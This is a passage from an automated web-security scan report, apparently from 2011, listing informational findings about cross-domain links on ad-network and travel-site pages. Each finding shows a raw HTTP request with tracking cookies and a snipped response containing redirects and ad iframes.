Referer: http://as.chango.com/links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Found
Location: http://gcm.chango.com/collector/relator?id=E1&partnerId=&referrerURL=&token=b6ae888c-d95b-11e0-b096-0025900e0834
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Sun, 02 Oct 2011 23:58:03 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 321
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://gcm.chango.com/collector/relator?id=E1&amp;partnerId=&amp;referrerURL=&amp;token=b6ae888c-d95b-11e0-b096-0025900e0834">here</A>
...[SNIP]...
19.111. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?nid=invitemedia HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Found
Location: http://g-pixel.invitemedia.com/gmatcher?id=E1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Sun, 02 Oct 2011 23:59:06 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 242
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://g-pixel.invitemedia.com/gmatcher?id=E1">here</A>
...[SNIP]...
19.112. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?nid=invitemedia HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6393&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Found
Location: http://g-pixel.invitemedia.com/gmatcher?id=CAESEDEkmOR_JA2g3tPQAqL09Zs&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Sun, 02 Oct 2011 23:59:53 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 278
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://g-pixel.invitemedia.com/gmatcher?id=CAESEDEkmOR_JA2g3tPQAqL09Zs&amp;cver=1">here</A>
...[SNIP]...
19.113. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?nid=xplusone1&_r=1 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.xp1.ru4.com/meta?_o=179638&_t=cmcont&ssv_ptnr=pm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Found
Location: http://m.xp1.ru4.com/um?_r=1&_o=62795&_i=52786&_u=E1&_r=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Mon, 03 Oct 2011 00:13:09 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 270
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://m.xp1.ru4.com/um?_r=1&amp;_o=62795&amp;_i=52786&amp;_u=E1&amp;_r=1">here</A>
...[SNIP]...
19.114. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?nid=invitemedia&redirectURL=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D1423484%26id%3D1423481%26id%3D1423480%26id%3D1423483%26id%3D1423482%26t%3D2 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://fls.doubleclick.net/activityi;src=3057879;type=searc451;cat=searc443;u1=US;u12=109368;u13=324884;u14=255157;u15=1643195;u16=04%2F10%2F11-07%2F10%2F11;u18=2;ord=53963720?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Found
Location: http://g-pixel.invitemedia.com/gmatcher?id=CAESEAxxFW9mtGU6p1AMb23X4HM&cver=1&redirectURL=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D1423484%26id%3D1423481%26id%3D1423480%26id%3D1423483%26id%3D1423482%26t%3D2
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Mon, 03 Oct 2011 00:10:44 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 418
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://g-pixel.invitemedia.com/gmatcher?id=CAESEAxxFW9mtGU6p1AMb23X4HM&amp;cver=1&amp;redirectURL=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D1423484%26id%3D1423481%26id%3D1423480%26id%3D1423483%26id%3D1423482%26t%3D2">here</A>
...[SNIP]...
19.115. http://cms.ad.yieldmanager.net/v1/cms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cms.ad.yieldmanager.net
Path:   /v1/cms

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /v1/cms?esig=1~862d802dd86fb59368388ad078a7f298ddbbd0b7&nwid=10000424978&sigv=1 HTTP/1.1
Host: cms.ad.yieldmanager.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://cdn.turn.com/server/ddc.htm?uid=2944787775510337379&mktid=&mpid=&fpid=5&rnd=2692888823581473023&nu=n&sp=y&ctid=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XO=y=1&t=269&v=3&yoo=1&XTS=1317129649&XSIG=0L.VWitFPbxt_lWYSM3ztrMCI9U-; BX=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii&t=269

Response

HTTP/1.1 302 Found
Date: Sun, 02 Oct 2011 23:53:07 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Location: http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/?xid=u02DzKG_.KFBo5S2yyqljPCE
Cache-Control: private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 792

HTTP/1.1 302 Found
Date: Sun, 02 Oct 2011 23:53:07 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PU
...[SNIP]...
n.com/r/cms/id/0/ddc/1/pid/43/uid/?xid=u02DzKG_.KFBo5S2yyqljPCE
Cache-Control: private
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8

The document has moved <A HREF="http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/?xid=u02DzKG_.KFBo5S2yyqljPCE">here</A>
...[SNIP]...
19.116. http://d.tradex.openx.com/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /afr.php?refresh=40&zoneid=6509&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OXRB=28_4196; __utma=20948333.858847159.1317599444.1317599444.1317599444.1; __utmb=20948333.6.6.1317599444; __utmc=20948333; __utmz=20948333.1317599444.1.1.utmcsr=goal.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/teams/england/97/man-utd-news; __qca=P0-1745582797-1317599446738; __csref=http%3A%2F%2Fwww.goal.com%2Fen%2Fteams%2Fengland%2F97%2Fman-utd-news; OAID=6f699005174db05207a17138d8473dc0

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:59:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=6f699005174db05207a17138d8473dc0; expires=Mon, 01-Oct-2012 23:59:19 GMT; path=/
Content-Length: 2698
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<!-- BEGIN STANDARD TAG - 160 x 600 - ROS: Run-of-site - DO NOT MODIFY -->
<IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=160 HEIGHT=600 SRC="http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909"></IFRAME>
...[SNIP]...
19.117. http://d.tradex.openx.com/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /afr.php?refresh=40&zoneid=6510&cb=INSERT_RANDOM_NUMBER_HERE&loc= HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://d.tradex.openx.com/afr.php?refresh=40&zoneid=6510&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OXRB=28_4196; __utma=20948333.858847159.1317599444.1317599444.1317599444.1; __utmb=20948333.6.6.1317599444; __utmc=20948333; __utmz=20948333.1317599444.1.1.utmcsr=goal.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/teams/england/97/man-utd-news; __qca=P0-1745582797-1317599446738; __csref=http%3A%2F%2Fwww.goal.com%2Fen%2Fteams%2Fengland%2F97%2Fman-utd-news; OAID=6f699005174db05207a17138d8473dc0

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:59:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=6f699005174db05207a17138d8473dc0; expires=Mon, 01-Oct-2012 23:59:58 GMT; path=/
Content-Length: 3032
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<!-- BEGIN STANDARD TAG - 300 x 250 - ROS: Run-of-site - DO NOT MODIFY -->
<IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=300 HEIGHT=250 SRC="http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909"></IFRAME>
...[SNIP]...
19.118. http://d.tradex.openx.com/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OXRB=28_4196; OAID=6f699005174db05207a17138d8473dc0

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:52:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=6f699005174db05207a17138d8473dc071952f762daf6c74f0896932; expires=Mon, 01-Oct-2012 23:52:12 GMT; path=/
Content-Length: 2691
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<!-- BEGIN STANDARD TAG - 728 x 90 - ROS: Run-of-site - DO NOT MODIFY -->
<IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=728 HEIGHT=90 SRC="http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=728x90&section=2126909"></IFRAME>
...[SNIP]...
19.119. http://delivery.hotels.com/Hotels/Delivery.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://delivery.hotels.com
Path:   /Hotels/Delivery.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /Hotels/Delivery.aspx?LAN=en_US&P=HOTELS_RESULTS&D=BOS&CI=10%2f04%2f2011&CO=10%2f07%2f2011&pr=1&pa0=2&CUR=USD&RID=F26233EF-31CE-4292-B85B-D59136E17861&HsrchId=8a1f660d-3224-44b2-81e5-6c5cf059520f&ads=3&HTID1=279478&HP1=289.00&HTID2=507871&HP2=385.67%7c308.53&HTID3=382704&HP3=432.33&HTID4=278318&HP4=425.67%7c383.10&HTID5=282295&HP5=429.00&HTID6=280489&HP6=409.40&HTID7=280555&HP7=412.33&HTID8=281066&HP8=401.33&HTID9=286928&HP9=399.00&HTID10=286520&HP10=379.95&HTID11=279419&HP11=349.00&HTID12=278651&HP12=345.67&HTID13=341115&HP13=399.00%7c359.10&HTID14=293264&HP14=414.00&HTID15=290317&HP15=399.00%7c339.15&HTID16=294968&HP16=419.00&HTID17=282971&HP17=127.99&HTID18=278530&HP18=359.00&HTID19=278584&HP19=445.67&HTID20=469918&HP20=445.67&HTID21=296221&HP21=399.00&HTID22=287041&HP22=436.33&HTID23=387950&HP23=392.33&HTID24=289629&HP24=221.10&HTID25=279089&HP25=263.33&HTID26=284205&HP26=335.67&HTID27=279064&HP27=295.67&HTID28=293346&HP28=309.00&HTID29=534622&HP29=875.00&HTID30=286858&HP30=439.00&HTID31=392615&HP31=124.99&HTID32=290613&HP32=143.99&HTID33=327172&HP33=103.00%7c72.10&HTID34=279428&HP34=149.22%7c141.76&HTID35=278489&HP35=223.74%7c178.99&HTID36=292088&HP36=126.66&HTID37=362369&HP37=229.95&HTID38=283739&HP38=106.66&HTID39=281930&HP39=159.00&HTID40=392054&HP40=129.99&HTID41=279446&HP41=439.00&HTID42=280626&HP42=179.00&HTID43=291348&HP43=129.99&HTID44=299565&HP44=175.67&HTID45=302276&HP45=549.00&HTID46=362518&HP46=230.00&HTID47=287689&HP47=124.99&HTID48=345803&HP48=106.66&HTID49=562856&HP49=103.00&HTID50=287601&HP50=99.99 HTTP/1.1
Host: delivery.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SSRT=Kf2ITgA; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; SSLB=1; SSPV=EMAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAA; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUw..

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: UID=1961757583|1|0; expires=Tue, 02-Oct-2012 00:10:12 GMT; path=/
Set-Cookie: hl_upm=Y4E7n03ene2ZDIPTWpLM1HtSrQx1OyDdsY4KBK1Ss8UP/OJVjMn5RXwMzdzUolZoFNbG0LY/3mcZcj1YGkhYg9cf+1x7zjDp93dVTciqsDvIIF2mmYFd1RbFocYxB9o//yaseYy3OsV0S8C79JNlCVbfn5N53QGPKIW9FCknA/oIYfb3tgn5TXtpCoHoL5Zu2ExEwcU/MA/DwgQacyCqbkHdE577MIjt2DKh7MxWUmkvXndCU208bGgFm4Qs6PiVmjW45gH5UX/uhZ4lXzi0tTLmv38iaf58; expires=Thu, 02-Oct-2014 00:10:12 GMT; path=/
X-Powered-By: ASP.NET
p3p: CP="ALL DSP COR CUR ADMo DEVo PSAo PSDo IVDi OUR STP PRE"
Date: Mon, 03 Oct 2011 00:10:12 GMT
Connection: close

var th_InsType1=0;var th_InsType2=0;var th_InsType3=0;var th_InsType4=0;var th_InsType5=0;var th_InsType6=0;var th_InsertStart=new Date();var th_instanceArray=new Array();var THSearch = 3861123723;var
...[SNIP]...
<div class="TH_IMG" style="float: left; padding:0px 6px; 0 10px"><img src="https://media.expedia.com/media/content/expuk/graphics/hcom/internal/vao_icon_sweet.png" /></div>
...[SNIP]...
<td style=\'padding: 0px 5px 0px 10px; vertical-align:middle;\'><img src="https://media.expedia.com/media/content/expuk/graphics/hcom/internal/vao_icon_sweet.png" style=\'padding-right:5px;\'></td>
...[SNIP]...
19.120. http://dm.travelocity.com/html.ng/site=travelocity&adsize=728x90&cobrand=TRAVELOCITY&area=homepage&Section=frontdoor&tile=60048504&random=-99147040413176  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/site=travelocity&adsize=728x90&cobrand=TRAVELOCITY&area=homepage&Section=frontdoor&tile=60048504&random=-99147040413176

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /html.ng/site=travelocity&adsize=728x90&cobrand=TRAVELOCITY&area=homepage&Section=frontdoor&tile=60048504&random=-99147040413176? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:13 GMT
Server: Apache
X-Server: prdlmn3110
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:08:13 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 884
Content-Type: text/html

<a href="http://dm.travelocity.com/event.ng/Type=click&FlightID=83479&AdID=152818&TargetID=8870&ASeg=&AMod=&AOpt=0&Segments=1,9,3090,5796,5878,9520,10495,11148,12670,20052,20299,20311,22041,22251,2230
...[SNIP]...
ect=http://leisure.travelocity.com/Promotions/0,,TRAVELOCITY|6266|pkg_main,00.html?locLink=GLB_HOMEPAGE|SUBNAV&WA1=03030&WA2=HP&WA3=728&WA4=110118_green_hotels_728x90gif&WA5=IM&WA7=5613" target="_top"><img src="http://i.travelpn.com.edgesuite.net/Sponsor_gifs/110118_green_hotels_728x90.gif" width="728" height="90" border="0" alt="Green Travel Deals"></a>
19.121. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.1.10.1317600495; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:19 GMT
Server: Apache
X-Server: prdlmn0408
AdServer: 10.28.75.27:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:08:19 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 896
Content-Type: text/html

<a href="http://dm.travelocity.com/event.ng/Type=click&FlightID=125327&AdID=178801&TargetID=31769&ASeg=&AMod=&AOpt=0&Segments=1,9,3090,5714,5796,9520,10495,11148,12670,20052,20299,20311,22041,22251,22
...[SNIP]...
,2468,2537,4760,4772,6472,6474,6510,6974,8829,9080,9119,12194,12196,12728,12736,12804&RawValues=USERID%252Ca1c4b0d-32323-499133968-1317600484&Redirect=http://www.travelocity.com/Roam" target="_blank""><img src="http://i.travelpn.com.edgesuite.net/Sponsor_gifs/110902_roamgnome_300x250.jpg" alt="Travelocity Contest" width="300" height="250" border="0"><img src="http://travel.travelocity.com/___waseq.img?WA1=03031&WA2=ent&WA3=300&WA4=110902_roamgnome_300x250jpg&WA5=IM&WA7=16428" width="1" height="1" border="0">
...[SNIP]...
19.122. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel§ion=wait&dest=BOS&random=042027615  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel&section=wait&dest=BOS&random=042027615

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel&section=wait&dest=BOS&random=042027615? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
